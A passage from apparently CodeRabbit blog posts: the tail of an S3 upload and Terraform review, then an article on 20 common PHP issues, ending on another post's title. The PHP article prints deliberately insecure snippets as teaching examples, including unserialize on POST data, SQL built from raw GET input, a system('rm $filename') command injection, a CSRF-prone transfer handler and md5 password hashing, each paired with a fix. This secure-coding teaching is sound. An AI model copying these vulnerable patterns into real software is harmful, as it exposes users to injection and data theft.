const rawDataFile = 'customer_data.csv';
const processedDataFile = 'sales_data.parquet';

async function uploadFile(fileName, key) {
  const fileContent = fs.readFileSync(fileName);
  const params = {
    Bucket: bucketName,
    Key: key,
    Body: fileContent,
    ACL: 'private',
  };

  try {
    const data = await s3.upload(params).promise();
    console.log(`File uploaded successfully: ${data.Location}`);
  } catch (err) {
    console.error('Error uploading file:', err);
  }
}

uploadFile(rawDataFile, 'raw_data/customer_data.csv');
uploadFile(processedDataFile, 'processed_data/sales_data.parquet');
```

The file performs the following key operations:

1. Initializes the AWS S3 client with the region.
2. Defines the target bucket name and file paths for upload.
3. Reads file content from the local file system.
4. Constructs upload parameters including bucket, key, and access control.
5. Uploads files to the specified S3 bucket paths.
6. Logs success or error messages after each upload operation.

Having walked through both files, let’s dive into each review comment from CodeRabbit.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/4740d0450610cc6b30bdc2d757ad5727f09b9ecd95be993eeeeb2b84008bb6d3_966153edce.png)

In the uploadFile.js script, CodeRabbit has identified potential issues with the current AWS SDK configuration. The code uses the AWS SDK v2, which is nearing its end-of-life, and should be upgraded to AWS SDK v3 for better performance and modern features. Additionally, the hardcoded region could be made more flexible by using environment variables. Finally, the method for providing AWS credentials is not clearly documented, which could lead to potential misconfigurations.
To improve this setup, it suggests migrating to AWS SDK v3, making the region configurable via environment variables, and explicitly documenting how to securely provide AWS credentials, either through environment variables or IAM roles when running in an AWS environment. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0982f688b84558523cc66138c7ca1c9bd703778f5d3d58a2a91ea0fde684c977_e5d14095de.png) The current implementation of file uploads in uploadFile.js lacks error handling and may result in both uploads being triggered in parallel, which can cause issues if sequential processing is needed. Additionally, without proper error handling, any failures during the upload process may go unnoticed. To address this, CodeRabbit suggests adding error handling and considering whether the uploads should be executed sequentially. This ensures that any upload failures are logged clearly, and subsequent steps are only executed if previous uploads succeed, thereby improving reliability and debugging in case of errors. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f939ec515eb806fbaf449222c86b8c2aff9982cf190da2f870625c62d841dfee_77dfd5da15.png) In the uploadFile.js script, CodeRabbit has detected that the bucket name and file paths are hardcoded, which reduces flexibility and makes it challenging to deploy in different environments (like dev, staging, or prod). Additionally, there is no validation to check if the specified files actually exist before attempting to upload them. To improve this, it suggests making the bucket name and file paths configurable using environment variables. It also recommends adding file existence validation to prevent errors during the upload process due to missing files. These enhancements will make the script more robust and adaptable to different deployment scenarios. 
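The configurability and file-existence suggestions are not specific to Node.js. As a language-neutral illustration, here is a minimal Python sketch of the same idea. The environment variable names `S3_BUCKET_NAME` and `RAW_DATA_FILE` and the helper `load_upload_config` are assumptions made for this example; they are not part of the reviewed script or of CodeRabbit's suggested patch.

```python
import os
from pathlib import Path


def load_upload_config(env=None):
    """Read the bucket name and file path from the environment and validate them."""
    env = os.environ if env is None else env

    bucket = env.get("S3_BUCKET_NAME")  # hypothetical variable name
    if not bucket:
        raise ValueError("S3_BUCKET_NAME must be set")

    # Fall back to the file name used in the article when no override is given.
    file_path = Path(env.get("RAW_DATA_FILE", "customer_data.csv"))  # hypothetical variable name
    if not file_path.is_file():
        raise FileNotFoundError(f"File to upload does not exist: {file_path}")

    return {"bucket": bucket, "file_path": file_path}
```

Failing fast on a missing bucket name or file keeps the error close to its cause, instead of surfacing later as a less obvious failure during the upload call.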
![](https://victorious-bubble-f69a016683.media.strapiapp.com/068870c27e0034206582b49c046aba9608e65a263a6bb2117ea6f036ba2bfb64_cf63695eef.png) CodeRabbit has identified that the uploadFile function has performance and reliability issues. It uses synchronous file reading, lacks content-type detection, and does not validate file size. Additionally, error handling is basic and does not cover specific issues like access denials or missing buckets. To improve the function, it is suggested to use asynchronous file reading, implement content-type detection, and validate the file size before upload. Enhanced error handling is also recommended to cover specific S3 errors, ensuring more robust and efficient file uploads. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a53562302ad2d4c859d3863143a33ec0732a6511b742bcb5d5b982f507938ab7_ffc6a1b251.png) It states that the aws\_region variable uses an uncommon default region (eu-north-1), which may not be familiar to all users. Additionally, there is no validation to ensure that only valid AWS regions are provided. To improve this, it is suggested to switch to a more widely used default region like us-east-1 or eu-west-1. Additionally, a validation condition is recommended to ensure that the provided region follows the proper [AWS region naming convention](https://docs.aws.amazon.com/general/latest/gr/rande.html#s3), enhancing the robustness and clarity of the configuration. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0819651defc1d16d9e8090f832882291d3dc08f943f0ace99530760f648bae66_7651a1fc7f.png) In the configuration, CodeRabbit recognized a potential issue with the lifecycle rule settings. The default 30-day transition to Glacier is considered too short for a data lake, as objects may need to remain accessible for a longer period before transitioning. It suggests extending the transition period to 90 days and adding validation to ensure the transition period is at least 30 days. 
Additionally, it recommends ensuring that the expiration period is longer than the transition period to avoid premature deletion of data. These changes will help ensure that data is transitioned and expired according to reasonable retention policies.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/603ffe9f1572a14a3083529a8ebd02d5018cff912b4455d77575954ce37c875f_ebab81af8c.png)

CodeRabbit has found security concerns in the current S3 bucket configuration. The public-read ACL is set, which allows public access to the bucket, potentially exposing sensitive data. Additionally, the CORS configuration is overly permissive, allowing requests from any origin and all headers, which could lead to unauthorized access. It suggests removing the public-read ACL and changing it to private to restrict access. Moreover, it recommends tightening the CORS settings by specifying allowed origins, limiting allowed methods to GET and PUT, and restricting headers to only those necessary, such as Authorization and Content-Type.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/de91b9edcda0c4c96f432e8032bb1690e3867744eb76492aeb20c7c3332d440b_95650c99ee.png)

CodeRabbit has identified a potential security risk in the current S3 object configuration. The configuration does not include encryption for sensitive data objects, such as customer and sales data, which could expose them to unauthorized access. Additionally, the source files should be verified for existence before attempting to create the objects in S3. To enhance security, it recommends adding [server-side encryption with AWS KMS](https://docs.aws.amazon.com/kms/latest/developerguide/overview.html) (aws:kms) to ensure that sensitive data is encrypted at rest. It also suggests using a KMS key (e.g., aws\_kms\_key.data\_lake\_key.arn) to manage the encryption.
Furthermore, a check should be added to verify the existence of the source files before proceeding with the upload to S3.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/873377b5166d66d9f0e1f4a7129a9574995ccc49e6f165f683fb8ac6ac6a5f43_e92b5339e0.png)

CodeRabbit has detected a conflicting access configuration in the S3 bucket setup. The current public access block settings are configured to block public ACLs and public policies, but the S3 bucket still has a public-read ACL. This creates ambiguity in the bucket's security posture and can lead to unintended public access. To resolve this conflict and enhance security, it suggests removing the public-read ACL from the S3 bucket, as previously suggested. This will ensure that the access control settings are aligned and the data is properly protected from unauthorized public access.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/cc093a5c6eed5f1e3df97bd8c13cd4cfaf5b009ce68b7c2b181ffaf22bddb06f_28e5f27cfa.png)

It has identified that versioning is currently disabled for the S3 bucket, which could pose a risk to data integrity. With versioning disabled, recovering from accidental deletions or modifications becomes difficult, which is especially critical in a data lake environment. To enhance data protection and ensure compliance, it recommends enabling versioning. This will allow for preserving, retrieving, and restoring every version of an object in the bucket, improving the resilience and reliability of data storage.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/659c53e78d29e59a850c236c6cc26f097eeb6fbe14aa0267cc17b2ce9db2bfca_2b1d23b411.png)

It points out that the S3 bucket name is hardcoded in the configuration, which limits the flexibility of your Terraform setup and makes it harder to maintain across multiple environments (e.g., dev, staging, production). To improve this, it suggests replacing the hardcoded bucket name with a variable.
This would make the configuration more reusable and adaptable, allowing different bucket names to be used depending on the environment.

As seen, CodeRabbit identified potential security risks in the S3 bucket configuration, including public access, permissive CORS settings, and lack of encryption, along with suggested fixes to mitigate these risks.

## Secure your S3 Infrastructure with AI Code Reviews

Minor configuration oversights today can become major security incidents tomorrow. CodeRabbit automatically reviews your S3 configurations during development, helping you ship secure code with confidence.

Join thousands of development teams who have secured their cloud infrastructure with CodeRabbit's automated code reviews. [Sign up in 2 minutes](https://www.coderabbit.ai/), and get your first PR review in 10 minutes.

How to Fix 20 Common PHP Issues With AI

Aravind Putrevu — Mon, 18 Nov 2024 00:00:00 GMT

PHP is still one of the most popular languages for server-side scripting because it’s simple, adaptable, and backed by an extensive [library](https://php.libhunt.com/) of frameworks and tools. However, its widespread adoption also comes with common coding challenges that can lead to security vulnerabilities, maintainability issues, poor performance, and inferior code quality.

As a PHP developer, team lead, or software engineer, you’ll often encounter recurring issues such as **SQL injection vulnerabilities**, **inefficient queries, poor error handling**, and **code duplication** that can slow down the development process, introduce bugs, and expose applications to security risks if not adequately addressed.

In recent years, AI has transformed the software development lifecycle. [AI code review tools](https://www.coderabbit.ai/blog/code-reviews-made-easy-how-to-improve-code-quality) like CodeRabbit automate the identification and resolution of coding issues, making it easier for programmers to write cleaner, more efficient, and more secure PHP code. These tools help you review code quality and streamline the process of identifying errors, suggesting fixes, and maintaining high standards for your source code.

This article will guide you through the following 20 common issues in PHP code and provide practical solutions using CodeRabbit as demonstrated in these pull requests: [PR 1](https://github.com/rojesh1993/PHPIssues/pull/1) and [PR 2](https://github.com/rojesh1993/PHPIssues/pull/2). By the end, you will better understand how AI can assist in fixing certain errors while improving code quality, security, and overall development productivity. I tried to make this list as comprehensive as possible, so feel free to skip any that you’ve already addressed.
**TL;DR: List of Common PHP Issues**

For a quick overview, here’s a breakdown of the issues, grouped by their frequency, impact, and relevance to PHP development:

**Critical and Often Overlooked:** the issues highlighted here are some of the most impactful yet frequently underestimated by developers. Addressing them is vital for maintaining secure and efficient applications.

1. Insecure deserialization
2. Misconfigured session management
3. Inefficient caching
4. Inefficient file handling
5. Improper use of arrays

**Important and Relevant but Often Missed:** these issues might not always be obvious but can significantly affect application performance, security, and maintainability.

6. Security vulnerabilities
7. Command injection
8. Insecure password handling
9. Improper use of static methods
10. Cross-Origin Resource Sharing (CORS)
11. Poor error handling
12. Deprecated functions
13. Hardcoding configuration data

**Worth Addressing for Overall Code Quality:** these issues contribute to better code quality and cleaner architecture when resolved.

14. Uncaught fatal errors
15. Inefficient queries
16. Lack of unit tests
17. Memory leaks
18. Code duplication
19. Over-complicated code
20. Inconsistent coding style

You can fix these manually or turn to an AI tool. To implement AI-suggested fixes, sign up to [CodeRabbit](https://www.coderabbit.ai/) and give it [access to your GitHub Repo](https://docs.coderabbit.ai/platforms/github-com/). CodeRabbit will be ready to review every pull request in the repo automatically.

## Issue #1: Insecure Deserialization

Insecure deserialization occurs when untrusted data is deserialized without proper validation, allowing attackers to inject malicious data structures or manipulate application logic.
Deserialization with functions like `unserialize()` on user-controlled data can lead to code execution, data manipulation, or privilege escalation.

```php
// Deserialization with unserialize function
$data = $_POST['data'];
$object = unserialize($data);
```

As shown in the image below, AI code review tools can suggest using JSON serialization instead of PHP serialization. This avoids deserializing untrusted input and the security vulnerabilities that can come with it.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/b6fb81e7590d7d9fedbc1203dc62e7ce9d196004f34855bcd2b619627267d276_f4b2475580.png)

## Issue #2: Misconfigured Session Management

Session management is one of those things that you might not think about until it goes wrong. Without secure session handling, your app could be vulnerable to session hijacking or unauthorized access.

```php
// Insecure session setup
session_start();
```

Experienced developers typically have templates for setting up secure sessions. Automated tools can identify weak session settings and suggest improvements, such as setting secure cookies, regenerating session IDs, and implementing session timeouts. These adjustments help ensure user sessions remain safe and secure.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/5eef37113275d2f849fea9a5a2fd752124a03852c5072279ca598846d31ac913_dd5dce9c76.png)

You can also apply these measures yourself:

* Regenerate session IDs on login to prevent session fixation.
* Use **secure, HTTP-only cookies** for session management.
* Enforce **session timeouts** and other security best practices.

These improvements help secure user sessions, reducing the chances of account compromise.

## Issue #3: Inefficient Caching

Without caching, your app can repeatedly make the same database calls, causing slowdowns and consuming resources, especially when handling repetitive tasks like database queries or API calls.
```php
// No caching, querying the database on every page load
$query = "SELECT * FROM posts";
$result = mysqli_query($connection, $query);
```

AI code review tools can help identify areas where caching can improve performance and suggest optimal strategies, as shown in the image below. This approach boosts data retrieval speed and reduces unnecessary server load.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/77a84bfa960d0ba0c1785fac73a7c607fe2627ebcfa0bc3af2e44821ed9c97ec_1764c5d797.png)

In this case, CodeRabbit’s suggestions are standard caching practices that apply across programming languages:

* Implementing [**Redis**](https://redis.io/) or [**Memcached**](https://www.memcached.org/) for in-memory caching.
* Leveraging [**object caching**](https://nelkodev.com/en/blog/how-to-implement-caching-in-php-to-improve-performance/) for database queries or external API calls.

By automating the identification of caching opportunities, AI code review tools help developers improve application performance and reduce load times.

## Issue #4: Inefficient File Handling

If you read or write large files all at once, you risk performance issues or even crashes. Loading a large file into memory may cause high memory usage or even exhaust available memory.

```php
// Loading a large file into memory
$data = file_get_contents('largefile.json');
```

Many inefficient file I/O operations go undetected in manual review; AI code review tools like CodeRabbit can help you identify such situations. Here is a snapshot of issues raised by the tool regarding the inefficient file handling of a large JSON file.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/c57d5325d17bf0a094a8d5fb8f386f1e602ca9915d2f3c76d772c3b18f2cb743_32e4fbe8b6.png)

The tool suggests ways to write better code and improve software quality, such as:

* Using **streaming techniques** to handle large files in smaller chunks.
* Implementing **buffering strategies** to optimize file reads and writes.
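As a rough illustration of the streaming suggestion, here is a minimal sketch that reads a file line by line with a generator instead of calling `file_get_contents()`. The function names `readLines()` and `countRecords()` are hypothetical, and the sketch assumes the data is stored as newline-delimited JSON (one record per line), which is not stated in the example above. A single large JSON document would need a streaming JSON parser instead.

```php
<?php
declare(strict_types=1);

/**
 * Yield the lines of a file one at a time, so only the current line
 * is held in memory regardless of the file's size.
 */
function readLines(string $path): Generator
{
    $handle = fopen($path, 'rb');
    if ($handle === false) {
        throw new RuntimeException("Unable to open {$path}");
    }

    try {
        while (($line = fgets($handle)) !== false) {
            // Strip the trailing line ending (LF or CRLF)
            yield rtrim($line, "\r\n");
        }
    } finally {
        // Always release the file handle, even if the caller stops early
        fclose($handle);
    }
}

/**
 * Decode one JSON record per line and count the records, skipping blank lines.
 * Assumption for this sketch: the file is newline-delimited JSON.
 */
function countRecords(string $path): int
{
    $count = 0;
    foreach (readLines($path) as $line) {
        if ($line === '') {
            continue;
        }
        // Throws JsonException on malformed input instead of returning null
        json_decode($line, true, 512, JSON_THROW_ON_ERROR);
        $count++;
    }

    return $count;
}
```

Because `readLines()` is a generator, memory use stays roughly proportional to the longest line rather than to the whole file, and the `finally` block closes the handle even when iteration ends early.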
Applying these suggestions results in faster file handling, reduced memory consumption, and improved performance.

## Issue #5: Improper Use of Arrays

PHP’s dynamic arrays are powerful but can lead to performance issues if not used efficiently, especially with large datasets.

```php
// Iterate over users array and extract name field into another array
$names = [];
foreach ($users as $user) {
    $names[] = $user['name'];
}
```

With automated tools, you can identify inefficient array handling and receive suggestions for better alternatives, as shown below:

![](https://victorious-bubble-f69a016683.media.strapiapp.com/af8819bfec9453aef688e281f7af83a2fc75cd8c77aedbbd4154561c64f0baad_14b797f11c.png)

Built-in functions like `array_column()`, `array_map()`, or `array_filter()` can be more efficient than hand-written loops. Optimizing array handling can significantly boost performance in PHP applications dealing with large data volumes.

## Issue #6: Security Vulnerabilities

PHP applications often face vulnerabilities like [**SQL injection**](https://en.wikipedia.org/wiki/SQL_injection), [**Cross-Site Scripting (XSS)**](https://en.wikipedia.org/wiki/Cross-site_scripting), and [**Cross-Site Request Forgery (CSRF)**](https://en.wikipedia.org/wiki/Cross-site_request_forgery). When you do not validate or sanitize input properly, or you mishandle user data, attackers can inject malicious code and compromise the entire database. Similarly, insecure session handling or a lack of password hashing can expose sensitive user information, leading to potential data breaches.

Though less common in modern applications, SQL injection is still a significant concern in applications with direct database interactions or user-generated content. Here’s a simple example of SQL injection.
```php
// Retrieve the 'username' parameter and use it to construct a SQL query to select all columns from users
$user_input = $_GET['username'];
$query = "SELECT * FROM users WHERE username = '$user_input'";
$result = mysqli_query($connection, $query);
```

Directly including user input in a SQL query is unsafe and creates a potential SQL injection vulnerability in the query construction. The details provided by an automated tool are shown in the snapshots below:

![](https://victorious-bubble-f69a016683.media.strapiapp.com/60fcc2f4c1198b5704e23963e9aa25da93d39508c2346c332a4f5a4db71ab23e_2074e990b1.png)

![](https://victorious-bubble-f69a016683.media.strapiapp.com/df1ecb53061cfd4bf62ef288e6b7199184a3f5a01cd4fd0986102a36dd59f013_45c516c46f.png)

![](https://victorious-bubble-f69a016683.media.strapiapp.com/9c3d7eaa28891821634a2c9cdba74baaae89619f70123093f4616a57d01aeeab_24e86a2228.png)

The recommended actions used in standard practice are as follows:

* Using **prepared statements** in SQL queries to prevent SQL injection.
* Applying **input validation and sanitization** and output escaping to prevent XSS attacks.
* Using **Object-Relational Mapping (ORM)** libraries to handle query parameterization.

Similarly, CSRF exploits the trust that a web application has in the user’s browser. When a user is authenticated, their browser automatically includes session cookies and other credentials in requests to the web application. An attacker crafts a malicious request and tricks the user into executing it, often through social engineering techniques like sending a link via email or embedding it in a malicious website. The web application processes the request as if it were a legitimate action from the authenticated user.
```php
// Start a session and process a POST request to transfer an amount to a recipient (vulnerable to CSRF)
session_start();
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $amount = $_POST['amount'];
    $recipient = $_POST['recipient'];
    // Process the transfer (vulnerable to CSRF)
    echo "Transferred $amount to $recipient";
}
```

![](https://victorious-bubble-f69a016683.media.strapiapp.com/0d4d9b6b600e9b10ed198ce7ba6a74e8ae45f238a364651e4086eb76a069585f_d1af6e8abb.png)

From the image above, an automated tool detected the following security issues and suggested code improvements:

1. CSRF vulnerability allows unauthorized transfers
2. Missing input validation and sanitization
3. No authentication check
4. Potential XSS vulnerability in the echo statement

Automating these checks can drastically reduce security risks and ensure your applications are better protected against these common attacks.

## Issue #7: Command Injection

Functions like `exec()`, `shell_exec()`, `system()`, and `passthru()` execute system commands and are dangerous when they incorporate user input directly. An attacker may inject malicious system commands into input fields, and the server will execute them if the input is not validated or sanitized.

```php
// Running system commands with input data
$filename = $_GET['filename'];
system("rm $filename");
```

AI code review tools can easily detect this risky command injection vulnerability and recommend safer alternatives, such as using the `unlink()` function.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/fd86dd062fafc01b912a99585b99c8f5ee5d8eb7c6c558c458fbdf75cad8c74a_7199437504.png)

## Issue #8: Insecure Password Handling

Storing passwords insecurely is a major risk. Storing passwords in plain text or hashing them with a weak algorithm leaves user credentials exposed if the database is ever leaked.
```php
// Insecure password storage
$password = md5('password123');
```

AI code review tools can detect insecure password storage practices and suggest using **strong hashing algorithms** like [**bcrypt**](https://en.wikipedia.org/wiki/Bcrypt) or [**Argon2**](https://en.wikipedia.org/wiki/Argon2) to protect sensitive user data.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/289ef8fe4408a39911b2962ef0705b07f0d31c71104fbb577b2fedb3febbce48_97784426b5.png)

## Issue #9: Improper Use of Static Methods

Overusing static methods in PHP can make code less flexible and harder to test.

```php
// Static method overuse
class User {
    public static function getName() {
        return "John";
    }
}
```

Integrating an automated tool helps identify the overuse of static methods, as shown below:

![](https://victorious-bubble-f69a016683.media.strapiapp.com/b48559eb193e152df28156e52be09d9bfbb4849263c0105799686b7190690da9_ba579ce0de.png)

Refactoring the code with the following suggestions can help improve the code quality:

* Converting static methods to instance methods where appropriate.
* Applying object-oriented principles like **polymorphism** to improve code flexibility.

## Issue #10: Cross-Origin Resource Sharing (CORS)

Cross-Origin Resource Sharing (CORS) is a security mechanism implemented by web browsers to control how web pages can make requests to different domains (origins). It works alongside the Same-Origin Policy (SOP), which restricts web pages from making requests to a different origin than the one that served the page; CORS headers let a server declare which other origins may be exempted from that restriction. Together they help prevent malicious websites from making unauthorized requests on behalf of a user, which could lead to security issues like data theft or unauthorized actions. Misconfigurations can easily lead to errors or open security holes.
```php
// Configuration that allows Cross-Origin access
header("Access-Control-Allow-Origin: *"); // Allows any domain to access the resource
header("Access-Control-Allow-Methods: GET, POST, PUT, DELETE"); // Allows all HTTP methods
header("Access-Control-Allow-Headers: *"); // Allows all headers
header("Access-Control-Allow-Credentials: true"); // Allows credentials (cookies, authorization headers, etc.)
```

Configuring CORS correctly can be tricky for developers. It requires precise CORS settings on the server, and developers usually need to balance security with functionality. CORS issues often arise when moving from a development environment to a production environment with a different domain.

With automated tools, you can identify misconfigured CORS headers that pose security risks and receive tailored configuration suggestions, as shown in the image below:

![](https://victorious-bubble-f69a016683.media.strapiapp.com/6a68bdb43a9e8bb01e71ef1cf11dd0e41ad053106fe8377c72b234129d20fdca_2348edec1e.png)

## Issue #11: Poor Error Handling

You’ve likely encountered crashes that leave you with no useful information to trace the problem. Inadequate error handling can make it feel like you’re chasing ghosts in your codebase as you search for the source of the issue. This complicates debugging and hurts your productivity.

```php
// File handling without any error handling
$data = file_get_contents('data.txt');
```

Gaps in error handling, such as missing try-catch blocks or missing checks for the failure case (file handling in this example), may lead to errors or warnings. The file may not exist or may be inaccessible.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/3d004f11e6f5fca22a2f6c1762605bc44b18b5733500be33b23faaeb37199a0c_b262dbb8cf.png)

Other best practices can also be implemented, such as:

* Wrapping potentially error-prone code (e.g., database operations, file handling) in try-catch blocks.
* Logging errors and handling exceptions in a way that ensures graceful recovery.

These suggestions help improve your application's code quality and robustness, minimizing the likelihood of unhandled exceptions affecting performance or user experience.

## Issue #12: Deprecated Functions

Using deprecated functions is like walking on thin ice: they might work now but can break in future PHP versions.

```php
// Use of deprecated function split() for splitting string
$var = split(',', $string);
```

Automated review tools can flag deprecated functions and suggest modern alternatives, helping keep your code future-proof and less vulnerable to compatibility issues.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/68c3e623bae89d4f7b6f22d36c1219e3e35d158d830c9df9b3152e53762bfcd2_3f61d821ff.png)

## Issue #13: Hardcoding Configuration Data

Hardcoding sensitive data (e.g., database credentials, API keys) in your PHP files poses security risks, especially when your code is shared or deployed. Hardcoding configuration data is generally considered an anti-pattern due to known security and maintainability issues.

```php
$API_KEY = 'ThisISsomeRandomAPIKey';
```

With modern secrets management tools such as AWS Secrets Manager, Azure Key Vault, or HashiCorp Vault, this is increasingly rare. However, many new developers still hardcode certain configurations directly into source code because it seems simpler. Some of the most common hardcoded configurations are:

* Database credentials such as host, database name, and even username and password.
* API keys and tokens for third-party services.
* File paths and URLs to important files or directories.
* Application settings and flags.

As shown below, automated tools can detect hardcoded values in your PHP code and recommend secure alternatives, such as using environment variables or secrets management systems.
![](https://victorious-bubble-f69a016683.media.strapiapp.com/57f9f07ab23f516caec3bfc93e65f07bb901e4473e0cc9e2956f205062b685ad_57d32c7078.png)

Here are some recommended best practices and tools to handle configuration and credentials:

* Storing sensitive data in environment variables or configuration files.
* Using tools like dotenv to load environment variables securely.

## Issue #14: Uncaught Fatal Errors

Uncaught fatal errors, such as those caused by missing functions or classes, can crash an entire PHP application. These errors make the system unavailable until the issue is resolved, leaving users with a frustrating experience.

```php
// Fatal error due to undefined function
$result = getUserDetails();
```

AI tools can scan for areas where fatal errors might occur and suggest ways to handle them better, making your application run more smoothly.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/56d47527980ebc17307348480aab49ee87c7ca0856d093d578bcd1d4929e9581_e6784a2bc6.png)

In situations like the one in the image above, the recommendation is to:

* Implement a **global error handler** to catch fatal errors.
* Use **custom error handling functions** to log issues and present user-friendly error pages rather than crashing the application.

This ensures that your application can remain operational and user-friendly even when a serious error occurs.

## Issue #15: Inefficient Database Queries

Inefficient database queries are a common bottleneck for your app’s performance. If you’re fetching too much data, running unnecessary joins, or missing crucial indexes, your app can end up painfully slow. Such unoptimized queries also cause scalability issues, particularly when dealing with large datasets.
```php
// Inefficient database query: selecting all
$query = "SELECT * FROM users";
$result = mysqli_query($connection, $query);
```

Identifying these inefficient queries can be challenging, but once found they can be optimized by adding indexes or fetching only the necessary columns. Through such optimization, you can keep your app running fast and smoothly, even under heavy loads.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/5f082362c27bed37548f812d2d3b5c8649ae032516a772b05f2433e26cd20424_2091ae30f5.png)

Code review tools can help analyze your database queries for inefficiencies such as:

* Unoptimized SELECT queries that fetch unnecessary data.
* Missing or inappropriate use of indexes.

They suggest query optimizations, such as adding appropriate indexes, reducing the number of table joins, and selecting only the required columns.

## Issue #16: Lack of Unit Tests

Testing might not be the most exciting part of coding, but it’s essential for ensuring reliability. Skipping tests often leads to bugs slipping into production and makes it hard to maintain code quality.

```php
// Function to add two numbers
function add($a, $b) {
    return $a + $b;
}
```

Automated tools like CodeRabbit can highlight areas of your codebase that lack test coverage.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/74ef66874634bf8fec232f086372e8757a205e95c12cb7e1c898a054f2f5ebed_60d5ac7c48.png)

It is usually recommended to:

* Write **unit tests** for all critical logic.
* Use testing frameworks like **PHPUnit** to ensure the reliability of your code.

By automating the process of identifying untested code, these tools make your code more reliable and easier to maintain.

## Issue #17: Memory Leaks

Memory leaks can quietly consume server resources, especially if you don’t close database connections or release resources.
```php
// Memory leak due to unclosed connection
$connection = new mysqli($host, $user, $pass, $db);
```

Automated review tools can detect potential memory leaks by analyzing your code for inefficient use of resources (e.g., large object allocations not being freed).

![](https://victorious-bubble-f69a016683.media.strapiapp.com/3559b9635f8bc99fef47d334bc085572323b29b706e466625f7bd536a11d2826_5f6cf70f1c.png)

They suggest solutions like:

* Properly closing database connections and file handles.
* Using PHP's **garbage collection** more effectively.

This helps maintain the performance and scalability of your application, especially under heavy load.

## Issue #18: Code Duplication

You've likely copied and pasted code and unintentionally created a mess of duplicated business logic throughout your project. Repeated blocks of code across a project lead to higher maintenance costs and increase the chances of bugs when changes are made.

The following code duplicates the logic for connecting to the database, executing a query, and processing the results: once for fetching user data and once for fetching product data.

```php
// Fetch user data
$conn = connectDatabase();
$sql = "SELECT * FROM users";
$result = $conn->query($sql);
if ($result->num_rows > 0) {
    while ($row = $result->fetch_assoc()) {
        echo "User: " . $row["username"] . "\n";
    }
}
$conn->close();

// Fetch product data
$conn = connectDatabase();
$sql = "SELECT * FROM products";
$result = $conn->query($sql);
if ($result->num_rows > 0) {
    while ($row = $result->fetch_assoc()) {
        echo "Product: " . $row["product_name"] . "\n";
    }
}
$conn->close();
```

Duplicated logic increases the risk of bugs and the effort required to maintain the code. Refactoring the code by replacing redundant sections with reusable functions or classes can improve the code quality. This keeps your codebase DRY (Don’t Repeat Yourself) and less error-prone.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/635f172f1ea377cda7f40c27c02451b536361446315f791ba5b613c12fa3eff3_881a884100.png)

AI code review tools like CodeRabbit promote the **DRY principle** by:

* Identifying sections of duplicated logic.
* Recommending ways to consolidate common functionality into reusable functions or classes.

This reduces redundancies and makes future maintenance easier.

## Issue #19: Over-Complicated Code

Sometimes, your code becomes overly complex with deeply nested loops or conditionals, making it hard to read, debug, and maintain, and leading to potential issues as your project evolves.

```php
// Complex nested conditionals
if ($a == 1) {
    if ($b == 2) {
        if ($c == 3) {
            echo "Success";
        }
    }
}
```

You can manually assess the code’s complexity, but this is time-consuming. This is where an AI code review tool like CodeRabbit can be really helpful.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/d149c774bfbfa7b7455c4315c10d064057bf401c1e1a889c20a2c1aa370faa0c_118986b2e4.png)

You could reduce the code complexity by:

* Breaking large functions into smaller, more manageable ones.
* Reducing deeply nested loops or conditionals.

Simpler code is easier to maintain, which reduces the likelihood of future bugs and makes your application easier to extend.

## Issue #20: Inconsistent Coding Style

Inconsistent coding styles can make your team projects messy and make collaboration difficult. With varying indentation, naming conventions, and formatting, the codebase can quickly become disorganized.
```php
// Non-conventional function naming style
function get_user_Data() {
    return "User data";
}
```

Like popular PHP tools such as [PHP\_CodeSniffer](https://github.com/squizlabs/PHP_CodeSniffer) and PHPStan, automated review tools also offer automatic formatting and style consistency checks based on popular coding standards, such as PSR-2 and PSR-12.

![](https://victorious-bubble-f69a016683.media.strapiapp.com/e5aaf303b6040b6f9a058da2f95eaaf48d9806a3f73f555c0070c16f47e00275_47057c5347.png)

By enforcing consistent coding and development practices, you can:

* Ensure cleaner, more readable code.
* Reduce friction when collaborating with other developers.

## What’s Next?

While this article has covered 20 common PHP issues and how AI tools like CodeRabbit address them, several additional challenges deserve your attention:

* **Advanced Error Reporting**: As applications scale, error reporting and monitoring tools like [Datadog](https://www.datadoghq.com/) become important. Look into integrating AI-driven monitoring solutions for a proactive approach.
* **Version Updates**: New PHP versions bring security and performance improvements. Tracking them on the official [PHP Release Page](https://www.php.net/releases/) and keeping your applications current helps you stay ahead of vulnerabilities.

Adopting these strategies can further enhance the quality of your PHP projects and prepare your applications for long-term success.

## Conclusion

Developing robust PHP applications requires addressing a range of considerations, from optimizing performance to ensuring code quality and security. Addressing these problems manually can be time-consuming and error-prone, especially as applications grow in size and complexity.
However, AI tools like [**CodeRabbit**](https://coderabbit.ai/) simplify this by automating the detection and resolution of common PHP issues, saving time and improving development efficiency. From improving security by eliminating vulnerabilities like SQL injection to enhancing code quality, this article explored 20 scenarios where CodeRabbit can significantly simplify the development process. Integrated with your repository, it automates code reviews in pull requests, identifies potential issues, and supports thorough testing and debugging. Sign up to [CodeRabbit](https://coderabbit.ai/) for a free trial and experience automatic reviews that enhance your application's quality while helping your team work faster and better. You can also join the [Discord channel](https://discord.gg/coderabbit) to connect with a community of developers, share insights, and discuss the projects you're working on.

How CodeRabbit Detects Secrets and Misconfigurations in IaC workflow?

Atulpriya Sharma — Tue, 12 Nov 2024 00:00:00 GMT

